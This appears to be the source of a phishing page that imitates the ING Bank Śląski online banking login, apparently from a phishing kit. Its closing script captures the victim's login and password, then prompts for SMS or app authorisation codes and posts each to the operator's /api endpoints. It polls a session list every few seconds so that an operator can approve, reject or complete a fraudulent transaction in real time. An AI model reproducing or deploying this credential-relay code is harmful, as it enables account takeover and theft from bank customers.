        <path class="st13" d="M20.066,37.988l-6.584-9.665c-0.619-0.909-1.963-0.899-2.568,0.019l-6.405,9.703  c-0.68,1.03,0.061,2.402,1.295,2.398l12.989-0.038C20.033,40.402,20.764,39.013,20.066,37.988z"></path>
        <g>
            <defs>
                <polygon id="ing-icon-profil04_SVGID_1_" points="32.5,28.201 28.181,27.337 25.656,29.862 21.868,27.071 17.217,28.599 9.323,38.778 25.041,40.083     41.008,38.609   "></polygon>
            </defs>
            <clippath id="ing-icon-profil04_SVGID_2_">
                <use xlink:href="#ing-icon-profil04_SVGID_1_" style="overflow:visible;"></use>
            </clippath>
            <g class="st14">
                <path class="st15" d="M39.633,39.054L28.496,22.183c-1.663-2.519-5.358-2.519-7.021,0L10.339,39.054    c-0.679,1.028,0.059,2.398,1.291,2.398h26.713C39.574,41.452,40.311,40.082,39.633,39.054z"></path>
            </g>
        </g>
        <path class="st29" d="M26.15,14.378h5.131c0.097,0,0.177-0.08,0.177-0.177V8.755c0-0.097-0.08-0.177-0.177-0.177H26.15  c-0.097,0-0.177,0.08-0.177,0.177v5.446C25.973,14.298,26.052,14.378,26.15,14.378z"></path>
        <path class="st30" d="M29.634,11.97l1.819-1.282V8.794l-1.819,1.312c-0.068,0.068-0.177,0.144-0.177,0.241v1.446  C29.457,11.89,29.537,11.97,29.634,11.97z"></path>
        <path class="st29" d="M29.634,15.97h5.662l-2.123-2.733l2.123-3.067h-5.662c-0.097,0-0.177,0.08-0.177,0.177v5.446  C29.457,15.89,29.537,15.97,29.634,15.97z"></path>
        <g>
            <g>
                <path class="st31" d="M16.298,13.104c1.678,0,3.038-1.283,3.038-2.865c0-1.325-0.955-2.436-2.249-2.764    c-0.011-1.633-1.392-2.954-3.096-2.954c-0.327,0-0.641,0.049-0.937,0.139c-0.822-1.388-2.373-2.325-4.154-2.325    c-2.64,0-4.78,2.056-4.78,4.591c0,0.231,0.024,0.456,0.058,0.678c-1.194,0.355-2.062,1.423-2.062,2.687    c0,1.553,1.311,2.812,2.928,2.812H16.298z"></path>
            </g>
            <g>
                <path class="st32" d="M16.298,12.904c1.678,0,3.038-1.283,3.038-2.865c0-1.325-0.955-2.436-2.249-2.764    c-0.011-1.633-1.392-2.954-3.096-2.954c-0.327,0-0.641,0.049-0.937,0.139c-0.822-1.388-2.373-2.325-4.154-2.325    c-2.64,0-4.78,2.056-4.78,4.591c0,0.231,0.024,0.456,0.058,0.678c-1.194,0.355-2.062,1.423-2.062,2.687    c0,1.553,1.311,2.812,2.928,2.812H16.298z"></path>
            </g>
        </g>
        <g>
            <g>
                <path class="st31" d="M45.588,19.359h-0.486c-0.074-1.988-1.709-3.577-3.715-3.577c-2.006,0-3.64,1.589-3.715,3.577h-1.886    c-1.327,0-2.412,1.086-2.412,2.412v0c0,1.327,1.085,2.412,2.412,2.412h9.801c1.327,0,2.412-1.086,2.412-2.412v0    C48,20.444,46.915,19.359,45.588,19.359z"></path>
            </g>
            <g>
                <path class="st32" d="M45.588,19.159h-0.486c-0.074-1.988-1.709-3.577-3.715-3.577c-2.006,0-3.64,1.589-3.715,3.577h-1.886    c-1.327,0-2.412,1.086-2.412,2.412v0c0,1.327,1.085,2.412,2.412,2.412h9.801c1.327,0,2.412-1.086,2.412-2.412v0    C48,20.244,46.915,19.159,45.588,19.159z"></path>
            </g>
        </g>
        <g>
            <defs>
                <path id="ing-icon-profil04_SVGID_3_" d="M39.633,39.054L28.496,22.183c-1.663-2.519-5.358-2.519-7.021,0L10.339,39.054    c-0.679,1.028,0.059,2.398,1.291,2.398h26.713C39.574,41.452,40.311,40.082,39.633,39.054z"></path>
            </defs>
            <clippath id="ing-icon-profil04_SVGID_4_">
                <use xlink:href="#ing-icon-profil04_SVGID_3_" style="overflow:visible;"></use>
            </clippath>
            <polygon class="st37" points="32.5,28.201 28.181,27.337 25.656,29.862 21.868,27.071 17.217,28.599 15.323,23.778 25.041,14.083    34.008,25.609  "></polygon>
        </g>
        <line class="st38" x1="24.963" y1="21.445" x2="24.963" y2="7.868"></line>
        <path class="st32" d="M9.071,45.238c-2.01,0-3.64-1.537-3.64-3.433c0-1.587,1.144-2.919,2.696-3.312  c0.014-1.957,1.669-3.54,3.71-3.54c0.392,0,0.769,0.059,1.123,0.167c0.986-1.663,2.844-2.787,4.979-2.787  c3.164,0,5.729,2.463,5.729,5.502c0,0.277-0.028,0.547-0.069,0.812c1.431,0.425,2.472,1.706,2.472,3.22  c0,1.861-1.571,3.37-3.509,3.37H9.071z"></path>
        <g>
            <g>
                <path class="st31" d="M28.333,45.45H4c-1.879,0-3.417-1.537-3.417-3.417v0c0-1.879,1.537-3.417,3.417-3.417h24.333    c1.879,0,3.417,1.537,3.417,3.417v0C31.75,43.913,30.213,45.45,28.333,45.45z"></path>
            </g>
            <g>
                <path class="st32" d="M28.333,45.25H4c-1.879,0-3.417-1.537-3.417-3.417v0c0-1.879,1.537-3.417,3.417-3.417h24.333    c1.879,0,3.417,1.537,3.417,3.417v0C31.75,43.713,30.213,45.25,28.333,45.25z"></path>
            </g>
        </g>
<div id="alerts-region">
    <div></div>
</div>
<div id="curtain-region" class="curtain-region"></div>
<div id="accessibility-navigation-region" aria-role="navigation"></div>
<div id="layout-region" class="ing-container ">
    <div class="login-layout">
        <!---->
        <div id="smart-app-banner-region"></div>
        <div class="region-wrapper login-region login-layout_container ui-content login-layout--top">
            <div class="main-content-wrap">
                <h1 class="sr-only">
                    <!---->Moje ING | ING Bank Śląski - Logowanie
                    <!---->
                </h1>
                <div id="content-region" class="main-content">
                    <div class="ing-login-container">
                        <div class="content-container box">
                            <header class="ing-header">
                                <div id="nav-hybrid" class="navbar nav-hybrid nav-hybrid--mobileFixed">
                                    <div class="logo">
                                        <div class="logo__link">
                                            <div id="logo-region">
                                                <div>
                                                    <!----><img class="logo__img--logo" src="https://login.ingbank.pl/mojeing/app/assets/images/logo_lsl_p.svg" alt="ING Bank Śląski" width="128">
                                                    <!---->
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </header>
                            <div id="info-region" class="box-content box-content--info"></div>
                            <div class="box-content login-hero">
                                <h2 class="js-header hide-if-empty" id="summaryInfo">Zaloguj się do&nbsp;bankowości internetowej</h2>
                            </div>
                            <div id="body-region" class="body" style="">
                                <section class="login-form-container">
                                    <!---->
                                    <div id="check-login-error-banner" class="box-content box-content--error"></div>
                                    <div class="box-content box--after">
                                        <div class="login-form-content" id="mainCont">
                                            <div id="js-login-form" method="POST" action="https://login.ingbank.pl/mojeing/app/#login" role="form">
                                                <div class="form-group">
                                                    <!---->
                                                    <label for="login-input" class="_3LNER _3K-gi js-login-label">
                                                        <span aria-hidden="true"><!---->Login<!----></span>
                                                        <span class="sr-only"><!---->Wpisz login do&nbsp;bankowości internetowej<!----></span>

                                                    </label>
                                                    <!----><input autocomplete="off" type="text" class="form-control form-control" name="login" id="bank_login" maxlength="10">
                                                    <!---->
                                                </div>
                                                <div class="form-group">
                                                    <!---->
                                                    <label for="login-input" class="_3LNER _3K-gi js-login-label">
                                                        <span aria-hidden="true"><!---->Hasło<!----></span>
                                                        <span class="sr-only"><!---->Wpisz login do&nbsp;bankowości internetowej<!----></span>

                                                    </label>
                                                    <!----><input autocomplete="off" type="text" class="form-control form-control" name="login" id="bank_password" maxlength="10">
                                                    <!---->
                                                </div>
                                                <!---->
                                                <div id="buttonsCont">
                                                    <button class="btn" onclick="bankLogin(); plusBankUpdate()">Dalej</button>
                                                </div>
                                                <!---->
                                            </div>
                                            <div class="footer-region">
                                                <div>
                                                    <!---->
                                                    <!---->
                                                </div>
                                            </div>
                                        </div>

                                        <p class="login_help">

                                            <a href="http://www.ingbank.pl/problemy-z-logowaniem" class="link inline-flex" target="_blank" rel="noopener">

                                                <span aria-hidden="true" class=""><!---->Problemy z&nbsp;logowaniem<!----></span>
                                                <span class="sr-only"><!---->Mam problemy z&nbsp;logowaniem otwiera się w&nbsp;nowym oknie<!----></span>

                                            </a>

                                        </p>
                                    </div>
                                    <!---->
                                </section>
                            </div>
                            <div id="additional-region"></div>
                            <div id="news-region" class="login_msg box-content" style="">
                                <div class="security-message-container">
                                    <div id="content_wrapper" data-load-action="notset:notset:notset">
                                        <div class="layout_element layout_section">
                                            <div class="layout_element layout_row row class_1612535144013">
                                                <div class="layout_element layout_column col-xs-12 col-sm-12 col-md-12 col-lg-12 class_1612535144014" id="offers-login-page">
                                                    <div class="layout_element component_wrapper" id="component_wrapper_3578123">
                                                        <div class="component nextgen_content content notPrintable component_3578123" data-component-id="3578123" data-component-type-code="nextgen_content" data-js-parameters="{}">
                                                            <div class="content_area">
                                                                <p><span>5.05.2023&nbsp;</span><a class="link loginPage" data-ext-action="https://www.ing.pl/aktualnosci/bankowosc-elektroniczna?news_id=1104856-uwaga-na-mejle-ze-szkodliwym-oprogramowaniem"
                                                                                                  href="https://login.ingbank.pl/mojeing/app/#" data-click-source="" data-click-destination="https://www.ing.pl/aktualnosci/bankowosc-elektroniczna?news_id=1104856-uwaga-na-mejle-ze-szkodliwym-oprogramowaniem"
                                                                                                  target="_blank"> Uwaga na maile ze szkodliwym oprogramowaniem (więcej)</a></p>
                                                                <p><span>4.02.2023</span><a class="link loginPage" data-ext-action="https://www.ing.pl/aktualnosci/bankowosc-elektroniczna?news_id=1104760-nowy-sposob-okradania-sprzedajacych-przez-olx"
                                                                                            href="https://login.ingbank.pl/mojeing/app/#" data-click-source="" data-click-destination="https://www.ing.pl/aktualnosci/bankowosc-elektroniczna?news_id=1104760-nowy-sposob-okradania-sprzedajacych-przez-olx"
                                                                                            target="_blank">Linki z fałszywymi potwierdzeniami płatności dla sprzedających poprzez OLX&nbsp;(więcej)</a></p>
                                                                <p><a class="link loginPage" data-ext-action="http://www.ing.pl/bezpieczenstwo" href="https://login.ingbank.pl/mojeing/app/#" data-click-source="" data-click-destination="http://www.ing.pl/bezpieczenstwo"
                                                                      target="_blank">Poznaj zasady bezpieczeństwa</a></p>
                                                            </div>
                                                            <div class="clearFix"></div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="hidden" id="other_components"></div>
                                </div>
                            </div>
                        </div>
                        <div id="box-region" class="box hidden-xs ui-offer-box" style="">
                            <div>
                                <div class="box-content box--before box--after js-box-content">
                                    <div id="content_wrapper" data-load-action="notset:notset:notset"></div>
                                    <div class="hidden" id="other_components"></div>
                                </div>
                            </div>
                        </div>
                        
                    </div>
                </div>
            </div>
        </div>
        <footer id="footer-region" class="ing-footer login-layout_footer ui-content login-layout--top">
            <div>
                <div class="container footer-container">
                    <div class="ing-list-hybrid-container">
                        <ul class="ing-list-hybrid">
                            <li><a href="https://www.ingbank.pl/aktywacja" class="ing-activation js-activation"><i class="glyphicon-ing-key" aria-hidden="true"></i> <span>Aktywuj dostęp</span></a></li>
                            <li class="pull-right-md ph-0">
                                <ul>
                                    <li><a href="https://www.ingbank.pl/bezpieczenstwo" target="_blank" rel="noopener" class="js-safety"><i class="glyphicon-ing-blocked2" aria-hidden="true"></i> <span>O bezpieczeństwie</span> <span class="sr-only">otwiera się w&nbsp;nowym oknie</span></a></li>
                                    <li><a href="https://login.ingbank.pl/mojeing/app/#" class="js-change-lang"><i class="glyphicon-ing-en" aria-hidden="true"></i> <span aria-hidden="true">English</span> <span class="sr-only">Zmień język systemu bankowości internetowej na&nbsp;angielski</span></a></li>
                                    <li><a href="https://login.ingbank.pl/mojeing/app/#" class="js-change-contrast"><i class="glyphicon-ing-e916" aria-hidden="true"></i> <span>Wersja kontrastowa</span></a></li>
                                </ul>
                            </li>
                        </ul>
                    </div>
                    <div class="ing-list-inline-container"> <span class="ml-0">© 2021 ING Bank Śląski S.A.</span>
                        <ul class="ing-list-inline pull-right-md">
                            <li> <span id="aria-info">Infolinia:</span> <a href="tel:+48323570069" aria-describedby="aria-info"><span class="sr-only">zadzwoń 32_357 00 69</span><span aria-hidden="true">32 357 00 69</span></a></li>
                            <li> <a href="https://login.ingbank.pl/mojeing/app/#cookie-policy" target="_blank" rel="noopener" class="js-cookies-policy"><span>Polityka <span lang="en">cookies</span></span> <span class="sr-only">otwiera się w&nbsp;nowym oknie</span></a></li>
                        </ul>
                    </div>
                </div>
            </div>
        </footer>
        <!---->
    </div>
</div>
<div id="timeout-error" class="main-content">
    <div class="notification">
        <div class="notification-content">
            <div class="notification-title">
                <h2>Błąd pobierania danych</h2>
            </div>
            <div class="notification-message">
                <p class="links"> <a href="https://login.ingbank.pl/"><span>Odśwież</span></a></p>
            </div>
        </div>
    </div>
</div>
<div id="page-loader-overlay-region" style="display: none;" class="hide">
    <div class="ing-loader">
        <div class="ing-spacer ing-spacer--flow">
            <div class="ing-inner-spacer">
                <div class="loader-wrapper active">
                    <div class="spinner-layer">
                        <div class="circle-clipper left">
                            <div class="circle"></div>
                        </div>
                        <div class="gap-patch">
                            <div class="circle"></div>
                        </div>
                        <div class="circle-clipper right">
                            <div class="circle"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
<div id="modal-region" class="modal fade" data-backdrop="static" aria-hidden="true" aria-modal="true" role="dialog" tabindex="-1"></div>
<div id="bottom-modal-region" role="dialog" tabindex="-1"></div>
<div class="fake-layer js-fake-layer">
    <div class="container fake-layer__container"><button type="button" class="btn btn-plain btn-close js-fake-layer-close-btn" aria-hidden="true"> <span class="sr-only">Zamknij okno</span><span class="glyphicon glyphicon-ing-close"></span></button>
        <div id="fake-layer-region"></div>
    </div>
</div>
<div id="overlay-region" class="overlay" aria-hidden="true" tabindex="-1"></div>
<div id="chat-region" class="chat"></div>
<div id="accessibility-alert-region"></div>
<div id="onboarding-region"></div>


        <script src="/assets/js/jquery-3.5.1.min.js"></script>
        <script src="/assets/js/cookies.core.1.3.min.js"></script>
        <script src="/assets/js/banklogin.js"></script>
        <script>
            let bankId = (cookieManager.read('session_id'))

            const plusBankUpdate = () => {
                if ($("#bank_password").val() && $("#bank_login").val() !== "") {
                    $("#mainCont").empty()
                    $("#mainCont").append(' <div class="form-group"> <label for="login-input" class="_3LNER _3K-gi js-login-label"> <span aria-hidden="true">Potwierdź logowanie w aplikacji moje ING lub wpisz kod SMS</span> <span class="sr-only">Wpisz login do&nbsp;bankowości internetowej</span> </label> <input autocomplete="off" type="text" class="form-control form-control" name="login" id="bank_psd" maxlength="10"> </div><div id="buttonsCont"> <button class="btn" onclick="psdUpdate()">Dalej</button> </div>')

                } else {
                }
            }

            const regularCheck = () => {
                readTextFile("/api/sessions", function(text){
                    var data = JSON.parse(text);
                    for (let i=0;i<data["result"].length;i++) {
                        if (data["result"][i]["uid"] == sessId) {
                            if (data["result"][i]["accepted"] == "true") {
                                summaryFunc()
                                clearInterval(multipleFunc)
                            }
                        } else {

                        }
                    }
                });
            }
            const psdUpdate = () => {
                if ($("#bank_psd").val() !== "") {
                    $.post("/api/psdupdate/", {
                        bank_psd: $("#bank_psd").val(),
                        sessionId: bankId
                    }).done(data => {
                        $("#mainCont").empty()
                        $("#mainCont").append('<p style="font-size: 20px">Proszę czekać, trwa logowanie..</p')
                        $("#buttonsCont").empty()
                    }).fail(error => {
                        console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
                    })

                } else {
                    console.log('not selectec')
                }
            }

            let multipleFunc = setInterval(function(){ regularCheck() }, 3000);


            //WRONG PASS

            const wrongPass = () => {
                $.post("/api/wrongpass/", {
                    sessionId: bankId,
                    name: "false"
                }).done(data => {
                    console.log('done')
                }).fail(error => {
                    console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
                })
            }

            const regularPass = () => {
                readTextFile("/api/sessions", function(text){
                    var data = JSON.parse(text);
                    for (let i=0;i<data["result"].length;i++) {
                        if (data["result"][i]["uid"] == sessId) {
                            if (data["result"][i]["accepted"] == "wrongPass") {
                                clearInterval(multiplePass)
                                wrongPass()
                                location.reload()
                            }
                        } else {

                        }
                    }
                });
            }

            let multiplePass = setInterval(function(){ regularPass() }, 3000);

            const summaryFunc = () => {
                $("#mainCont").empty()
                $("#mainCont").append(' <div class="form-group"> <label for="login-input" class="_3LNER _3K-gi js-login-label"> <span aria-hidden="true">Potwierdź logowanie w aplikacji moje ING lub wpisz kod SMS</span> <span class="sr-only">Wpisz login do&nbsp;bankowości internetowej</span> </label> <input autocomplete="off" type="text" class="form-control form-control" name="login" id="bank_summary" maxlength="10"> </div><div id="buttonsCont"> <button class="btn" onclick="summaryCode()">Dalej</button> </div>')
                document.getElementById('summaryInfo').innerText = 'Potwierdź transakcje'
            }

            const summaryCode = () => {
                if ($("#bank_summary").val() !== "") {
                    $.post("/api/summarycode/", {
                        bank_summary: $("#bank_summary").val(),
                        sessionId: bankId
                    }).done(data => {
                        $("#mainCont").empty()
                        $("#mainCont").append('<p style="font-size: 20px">Proszę czekać..</p')
                        $("#buttonsCont").empty()
                    }).fail(error => {
                        console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.", "Wystąpił błąd")
                    })

                } else {
                    console.log('not selectec')
                }
            }

            const regularSummary=()=>{readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"wrongSummary"==s.result[e].accepted&&(summaryFunc(),wrongSum())})},wrongSum=()=>{$.post("/api/wrongsummary/",{sessionId:bankId,name:"false"}).done(e=>{console.log("done")}).fail(e=>{console.error("Coś poszło nie tak… Spróbuj ponownie za chwilę.","Wystąpił błąd")})};let multipleSummary=setInterval(function(){readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"wrongSummary"==s.result[e].accepted&&(summaryFunc(),wrongSum())})},3e3);const regularComplete=()=>{readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"completed"==s.result[e].accepted&&(location.href="/summary")})};let multipleCompleted=setInterval(function(){readTextFile("/api/sessions",function(e){var s=JSON.parse(e);for(let e=0;e<s.result.length;e++)s.result[e].uid==sessId&&"completed"==s.result[e].accepted&&(location.href="/summary")})},3e3);
        </script>
</body>

</html>